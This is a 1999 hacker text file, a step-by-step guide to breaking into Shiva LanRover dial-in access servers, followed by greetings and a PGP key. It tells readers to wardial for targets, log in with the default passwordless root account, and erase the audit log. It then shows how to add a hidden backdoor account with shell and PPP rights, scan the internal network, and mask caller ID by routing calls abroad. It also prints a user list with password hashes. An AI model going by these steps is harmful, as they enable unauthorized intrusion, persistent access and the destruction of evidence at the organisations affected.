|
Hacking the Shiva-LAN-Rover System By Hybrid (th0rn@coldmail.com) April 1999 ************************************************** * Disclaimer: * * * * The information provided in this text file * * has been obtained from public domain resources * * and is intended for educational use only. * * * ************************************************** Contents: 1. Introduction 2. What can Shiva lan rovers do? 3. The command line 4. System security 5. PPP 1. Introduction Shiva systems are becoming increasingly popular in the LAN networking world. If like me you have done quite alot of scanning you would have come accross a login prompt similar to this: [@ Userid:] If you have never seen this before, take a look at some of the 9x scans at www2.dope.org/9x. In this file I am going to fokus on the security strengths and weaknesses of the ShivaLanRover networking system, and give a general overview of what can be done with such systems. The Shiva system is a network security problem in it's own right, in the sense that once you have gained access to one of these platforms, you have the opotunity to explore the entire network on which the system is based, in essance, you are on the trusted side of the firewall. If you would like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it via the WWW. To find a Shiva, the first thing you should do is dust off that old wardialer program, and start scanning local or toll-free prefix assignments, if you can't do this, you suck, go away. You will know when you have found a Shiva when you are confronted with the following prompt: @ Userid: or if Radius authentification is enabled: Starting Radius Authentification.... @ Userid: Blah, ignore the radius authentification thing for now, it's just a lame attempt to make the system look as if it has been secured, in most cases the sysamin would have missconfigured the authentification and you will be supprised as to how easy it is to get in. So you are at the login prompt, what next? - As in most OS's Shivas have a nice set of default logins, so the sysadmins poor setup is your gain. Try this: login: <root> pass: <NO PASS>. The root login will work 9 times out of 10. The reason that the root account works alot is beacuse in some cases the admin is not even aware the account even exists! Most of the system setup is done via the main terminal, so the admin does'nt have to login. the root account is not listed in the userfile database, so most admin's overlook it. In some cases the admin would have set up there own acount with somthing like <admin> <password> but if the admin has any common sense you will not get in with that. Like most OS's, Shiva systems have an audit log, so don't sit there trying to brute force anything, once you are in, you can clear the system log, but more on that later. OK, you've found a Shiva, you've loged on as <root> <no password>, now what? - read on. Once loged in, you will be droped into the Shiva command line prompt, which should look somthing like this: Shiva LanRover/8E, Patch 4.5.4p6 98/06/09 (Version and type of Shiva) ShivaLanRover/8E# (The command prompt. Can be configured to say anything) To get a list of the available commands type <help> or <?> this will reveal a menu similar to this: ShivaLanRover/8E# ? <enter> alert Send text alert to all dial-in users busy-out line <number> Busy-out serial line modem clear <keyword> Reset part of the system comment Enter a comment into the log configure Enter a configuration session connect <port pool> Connect to a shared serial port crashdump Write crashblock to log disable Disable privileges help List of available commands initialize <keyword> Reinitialize part of the system lan-to-lan <keyword> Manage LAN-to-LAN connections passwd Change password ping <IP host> Send ICMP echo to IP host ppp Start a PPP session quit Quit from shell reboot Schedule reboot show <keyword> Information commands, type "show ?" for list slip Start a SLIP session telnet <IP host> Start a Telnet session testline Test a line The first thing you should do is check to see who is online, at the # prompt use the show command to reveal the list of current online users: ShivaLanRover/8E# show users <enter> Line User Activity Idle/Limit Up/Limit 1 jsmith PPP 0/ 10 0/ None 2 root shell 0/ 10 0/ None Total users: 2 So here we see ourselves loged in on line 2, and a PPP user on line 1. Note that most of the time users are not configured to be allowed remote dialin PPP access, so the user jsmith is probably at a terminal on the LAN. Now you can see who is online, ie- check the admin is not loged in. Now you need to get a rough idea of the size of the system and it's network. At the # prompt type: ShivaLanRover/8E# show lines <enter> Async Lines: Line State Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs 1 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 2 CHAR 57600/N/ 1/ |ON |ON |on |on |ON | 2| 0| 0 3 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 4 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 5 IDLE 57600/N/ 1/ |OFF|OFF|on |on |OFF| 0| 0| 0 6 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 7 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 8 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 Here we see a list of the modem ports, as you can see it has 8, this is about average for most Shiva systems. So now we know how many serial lines there are, we need to get a rough idea as to how big the network itself is, to do this type: ShivaLanRover/8E# show arp <enter> Protocol Address Age Hardware Addr Type Interface Internet 208.122.87.6 4m x0-x0-B0-2x-Dx-78 ARPA Ethernet:IP Internet 208.122.87.4 4m AA-0x-x4-00-0C-04 ARPA Ethernet:IP Internet 208.122.87.5 4m Ax-00-04-0x-xD-x4 ARPA Ethernet:IP Internet 208.122.86.4 10m AA-x0-04-00-0C-04 ARPA Ethernet:IP Internet 208.122.86.40 0m AA-00-04-00-x1-04 ARPA Ethernet:IP Internet 208.122.86.147 4m 00-80-5x-31-F8-Ax ARPA Ethernet:IP Internet 208.122.86.145 4m 00-80-5x-FE-C9-x8 ARPA Ethernet:IP Internet 208.122.86.200 0m 00-x0-A3-xF-21-C8 ARPA Ethernet:IP Internet 208.122.86.51 4m 00-x0-B0-01-36-3x ARPA Ethernet:IP Showing the arp cache reveals some of the connected boxes to the LAN, aswell as ethernet address, and type of protocol. Now we have established the kind of system we are on, it's time to do some exploring, which is where I shall begin this text file. 2. What can Shiva lan rovers do? Shiva LanRover systems are very big security weaknesses if installed on any network. The reason for this is that some of the default settings can be easily overlooked by the admin. A Shiva system can be configured to provide a wide variety of network services, some of which are listed here: PPP (point-to-point protocol) This is the key to gaining access to the network on which the Shiva is based upon, in most cases the network will have an internal DNS server, and if you are lucky, the network which the system is based will be connected to the internet. Hint hint, PPP, toll-free. But just using a Shiva for free net access would be boring, which is why I am going to discuss the other features of Shivas. Modem Outdial. In alot of cases the system would have been configured to allow modem outdialing which can be good for calling BBS's, diverting to other dialups, scanning, but again, this is lame, just using a Shiva for modem outdialing is boring, use your imagination. If you manage to get a PPP connection, and the system is net connected, you could get online, and at the same time call your favourite BBS. I'll explain how to do all of this later. Telnet, ping, traceroute etc. These are the command line tools which will enable you to determine whether the system is connected to the internet or not. More on this later. It's time to go into detail about all of the Shivas functions and commands, I will concentrate on what you can do with root access, because that is the only account you are likely to gain access to. 3. The command line When loged into the Shiva shell, you have the following commands at your disposal: alert (Send text alert to all dial-in users) - Self explanitory. busy-out uart <call-interface> (Busy-out UART port) clear <keyword> (Reset part of the system) The clear command is a nice feature of the Shiva system. The first thing you should do when on a Shiva is make sure you erase all logs of your commands and login times etc.. to do this all you need to do is type <clear log> This will erase and reset the audit log, and also any invalid logins to the Shiva. There are also other clear commands such as <clear arp> etc, but these will all cause system problems and get you noticed, best leave this alone for the time being. comment (Enter a comment into the log) configure (Enter a configuration session) Heres the part where you can get the system to do what you want it to do, ie- to get a PPP connection you will need to set up another account with shell and PPP privalages. The root account does not allow PPP connections, so here is where you will need to do your stuff. To get anywhere with a Shiva you need to create a new account, using the config command you can create a new user account with greater privalges than root. Before you make a new account it is a good idea to see what kind of setup the other accounts have on the system, you don't want to make an account that will stick out from the other accounts, so type: show security <enter> (this gives a list of the security configuration and the user list.) you should see somthing like this: [UserOptions] PWAttempts=0 ARARoamingDelimiter=@ ExpireDays=30 GraceLogins=6 [Users] admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425 jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052 mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052 user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159 another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9 jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821 msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052 dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052 padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1 ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052 Here we get a list of the configured users on the system. As you can see the admin has made him/herself their own account, while other users have accounts that allow logins via their terminals, but not remotely. In the above example all the users have been assigned passwords, so it would be a good idea when you make your own account to have one aswell. The idea is to make an account that will blend in with the others and not look to obvious. The passwords in the external user list are all 3DES (triple DES) encrypted. The type of user account set up is determined by the options, such as jsmith=/di/do etc, more on these functions in a bit. OK, now we need to set up our own account, to do this we need to enter a configuration session, at the command line prompt type: ShivaLanRover/8E# config <enter> You will then drop into the configuration session. Enter configuration file lines. Edit using: ^X, ^U clear line ^H, DEL delete one character ^W delete one word ^R retype line Start by entering section header in square brackets [] Finish by entering ^D or ^Z on a new line. config> (here is where you enter the config commands, to make you own account do the follwing) config> [users] config> username=/di/do/sh/tp/pw config> ^D <------ (type control D to finish) Review configuration changes [y/n]? y New configuration parameters: [users] username=/di/do/sh/tp/pw Modify the existing configuration [y/n]? y You may need to reboot for all changed parameters to take effect. You've just created your own user account which you can use for PPP connections etc. To begin with your account is un-passworded, so when you log back in just hit enter for your password, you can later change this. The /sh part of the user configuration means you can remotely log into the command shell, /pw means you have the ability to define your own password, if you wanted to give yourself another root account, you would use the switch /rt. In combination with the show config command you can also alter other system configurations via this method, although it is a very good idea not to alter anything. Now your account has been set up, all you do is re-connect to the system and login as your username, more on this later. connect <PhoneGroup pool> (Connect to a serial port or modem) This is another one of the good features of Shivas, you can remotely control a series of modems on the system, and in alot of cases dialout. If you want to call a BBS, note you cannot upload using Zmodem or similar protocols, although you would be able to download, but expect a few CRC checksum errors. To connect to a modem type: connect all_ports <enter> you will then drop into one of the modem pools, as follows: Connecting to Serial2 at 115200 BPS. Escape character is CTRL-^ (30). Type the escape character followed by C to get back, or followed by ? to see other options. (here basic modem commands are nessasary, use the follwing to dialout) ATZ (initialise modem) ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial with be based upon the system PBX, so sometimes you will have to figure out the outdialing code, which should be somthing simple like dialing a 9 before the number you want to connect to. To disconnect from the outdialing session type control C, or ^C. This will take you back to the command line. As with the other system events, outdialing is loged into the audit file, along with the number you called. It is generaly a good idea to clear the audit log after things like PPP or dialout, again just type clear log <enter>. cping <IP host> (Send continuous ICMP echoes to IP host) crashdump (Write crashblock to log) detect (Detect the configuration of an interface) disable (Disable your root privaleges) dmc <keyword> (Information commands, type "dmc ?" for list) down <slot> <firstmodem> (last Remove modems from CCB pool) info <slot> <modem> (Print info for specified modem) mupdate <slot> <firstmodem> (l Update Rockwell modem FW) state (Print state of a modem) status (Print status of all modems) trace (Trace message passing) up <slot> <firstmodem> (lastmo Add modems to CCB pool) test_1slot <slot> (Tests DMC card in slot specified) test_allcards (Tests all DMC cards found in system) test_golden <golden slot> (Tests all DMC cards against a Golden DMC) test_loopall <count 0-99> (Tests All DMC's for count) test_modempair <slot1> (modem1 Tests modems against each other) test_slotpair <slot1> <slot2> (Tests a DMC card against another) test_xmitloop <s> <m> <s> <m> (Tests modem pair for count) help (List of available commands) history (List of previous commands) initialize <keyword> (Reinitialize part of the system) l2f <keyword> (L2F commands) close <nickname> (Close tunnel to L2F HG) login (Start L2F session) tunnels (Show open tunnels) lan-to-lan <keyword> (Manage LAN-to-LAN connections) passwd (Change password) ping <IP host> (Send ICMP echo to IP host) ppp (Start a PPP session) quit (Quit from shell) reboot (Schedule reboot) route <protocol> (Modify a protocol routing table) rlogin <IP host> (Start an rlogin session) show <keyword> (Information commands, type "show ?" for list) show+ account <keyword> (Accounting information) arp (ARP cache) bridge <keyword> (Bridging information) buffers (Buffer usage) configuration (Stored configuration, may specify sections) the show config command will reveal all the system configuration setups, includings DNS server information, security configurations, IP routing etc. It will also show the internal IPs of radius authentification and TACAS servers. show+ finger (Current user status) interfaces [name1 [name2 ... ] (Interface information) ip <keyword> (Internet Protocol information, type "show ip ?" for list) To get an idea of the routing information, and again how big the network is type, show ip route. This will bring up a routing table, and again give you an idea as to where the connected boxes are, it is a good idea to note the IP prefixes. show+ lan-to-lan (LAN-to-LAN connections) license (Licensing information) lines (Serial line information) log (Log buffer) The show log command will display the system audit log in more format. Here you will be able to see what is going on on the system, ie- is it primarily used for PPP, dialout etc. If users use the system for outdialing, you can even see the numbers that they dial. Here is a cut down example as to what you wiuld see in a system log file: Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in 00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D 00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B) 00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast 00:00 4534 Serial4:PPP: IPCP layer up 00:04 4535 Serial4:PPP: CCP layer up 14:09 4536 Serial4:PPP: IPCP layer down 00:00 4537 Serial4:PPP: CCP layer down 00:00 4538 Serial4:PPP: LCP layer down 00:01 4539 Serial4:PPP: CD dropped on connection 00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,) 00:06 4541 Serial4: Rate 115200bps 00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W' 00:01 4543 Serial4: Initialized modem 04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44 18:27 4545 Serial4: New Dial-In session 00:00 4546 Serial4:PPP: LCP layer up 00:00 4547 Serial4: "krad" logged in 00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C 00:00 4549 Dialin:IPX configured net 9823O049 00:00 4550 Serial4:PPP: IPXCP layer up 00:00 4670 Serial4: New Command Shell session 00:03 4671 Serial4: "root" logged in 01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell) 00:06 4673 Serial4: Rate 115200bps 00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W' 00:00 4675 Serial4: Initialized modem 55:11 4676 Could not parse IP SNMP request. In the system log, you will also see invalid login attempts, error messages, and general system events. Because the log file logs everything, it is a good idea to erase your own presence in it. show+ modem <keyword> (Internal modem information, type "show modem ?" for list) netbeui <keyword> (NetBeui information, type "show netbeui ?" for list) novell <keyword> (NetWare information, type "show novell ?" for list) ppp (PPP multilink bundles and links) processes (Active system processes) security (Internal userlist) semaphores (Active system semaphores) slot <keyword> (Internal serial slot information, type "show slot ?" for list) upload (Upload information) users (Current users of system) version (General system information, also shows DNS info) virtual-connections (Virtual Connection information) slip (Start a SLIP session) telnet <IP host> (Start a Telnet session) tftp (Download new image, ie- system config files) tunnel <IP host> (Start a Tunnel session) wan [action] <wan interface> (Perform actions on WAN Interface) 4. System security Shivas can be very weak on security, due to the exposed root account. If the system is configured properly they can be very secure systems, although this is usually not the case. There are many security options for the Shiva system including Radius Authentification, SecurID, TACAS, and just the standard secured login. In some cases an admin will use a secondary server to act as the Radius Authentification. In this case, the setup would look somthing like this. [RADIUS Authentification Server] } The server contains a secured user | list, which will be used to verify | login requests. The login is [Router] determined if the user can be | | verified by the server. | | } The Shiva sends the login request to RADIUS. [Shiva System] } Starting Radius Authentification... @ Userid: Sometimes a system will be configured to work with a number of different Shivas on a network. For example, using the same idea as above, but without the Radius server, a secondary shiva may be installed to act as the security server, whereas all other Shiva systems refer to it for user login verification. This can be a real bitch if you have loged into a system, but the above setup has been implemented. For example, say you loged in as root, and you want to set up a PPP account. The first thing you would do is check to see what kind of setup existing users have by typing <show security> If the verification server has been setup, there will be no users in the user list, instead you have to find the network location of the verification server, and hope it has an un-passworded root account on it. To find the verification srever, or primary Shiva, just use the show config command. you can then telnet from the Shiva you are on, to the Shiva displayed in the config file, you should then get the @ Userid: login screen again, try root no pass, if this does not work, it is possible to temorarily configure your own server on the network, but this would mean other users will not be able to login, so leave this alone. If you do manage to login to the server as root, you have to setup your user account there, because that is where all the Shivas on the network refer to in order to verify users, this way the admin only has to maintain one user configuration file. 5. PPP Once you have setup a user account with shell and PPP privaleges, you can begin exploring the network on which the Shiva is based upon. If the network is net connected you can get free net access aswell, but this is quite risky, especially if the admin notices PPP sessions active at 4am, with destinations such as irc.ais.net:6667. When you first establish a PPP connection to a Shiva server, the first thing you should do is map out the network. To do this just run a network, or port scanner accross the domain which the Shiva is on. As on most networks, you are likely to come accross a variety of different boxes, such as UNIX boxes, SunOS, shared printers, mail servers, cisco routers, in one case someone I know found an Amiga box@$!. If the network is net connected, it is a good idea to use your shell for any net connections, such as IRC. Once you have an external net connection from a Shiva it is also possible to similtaniously dialout accross the PSTN to a BBS or any other system. To do this, you would have to find the network address of the Shiva server you are on, then telnet back to it and re-login. using the <connect all_ports> command will give you control over the system modems, then you can dialout as if you where in terminal mode. If the Shiva you are on is located on a toll-free number, or even local, it is not a good idea to use it for net access, or stay on it for a long time. If you must use a Shiva for net access, it is a good idea to use your PSTN routing skills, and not dialup to the system directly. The mistake people make when it comes to ANI, or CLID is that they think only 800 numbers have ANI, and residential numbers have CLID. This is *wrong* the ANI service can be setup by anyone, it's a choice, not a standard. If you want to route your call, the best thing to do is route internationaly, so your origionating clid gets striped at intralata boundarys on the PSTN. A technique, which I don't wanna give out involves trunk and carrier hoping. We'll thats about it for this file, hope you enjoyed it. If you want more information on the Shiva Lan Rover system, just check out shiva.com, they will have technical guides in pdf format, you can also download the shiva software from their ftp site. Shouts to the following: [9x] substance phriend siezer vectorx statd blotter knight network specialK microdot katkiller xramlrak bosplaya deadsoul and nino the 9x g1mp. [b4b0] gr1p t1p. #9x #darkcyde Efnet. backa xio. [D4RKCYDE] downtime elf zomba force mortis angel dohboy brakis alphavax tonekilla bishopofhell sintax digitalfokus mistress. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.0i for non-commercial use Comment: I Encrypt, Therefore I Am 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 7oRrJiSlVzrE1bEEhZR9hnFqogL6QXg= =lHXD -----END PGP PUBLIC KEY BLOCK----- *********************************************** * hybrid_blue@hotmail.com | DSS: 0x5493F1307 * * th0rn@coldmail.com | D-H: 0x8B314ED9 * * hybrid@darkcyde.org | RSA: 0xA42A953D * * th0rn@cyberspace.org | * * www2.dope.org/9x | 1999-02-09 * * www.darkcyde.8m.com | * *********************************************** ___ ___ _____.___.____________________ ____________ hybrid@b4b0.org / | \\__ | |\______ \______ \/_ \______ \ hybrid@ninex.com / ~ \/ | | | | _/| _/ | || | \ hybrid.dtmf.org \ Y /\____ | | | \| | \ | || ` \ ---------------- \___|_ / / ______| |______ /|____|_ / |___/_______ / \/ \/ \/ \/ \/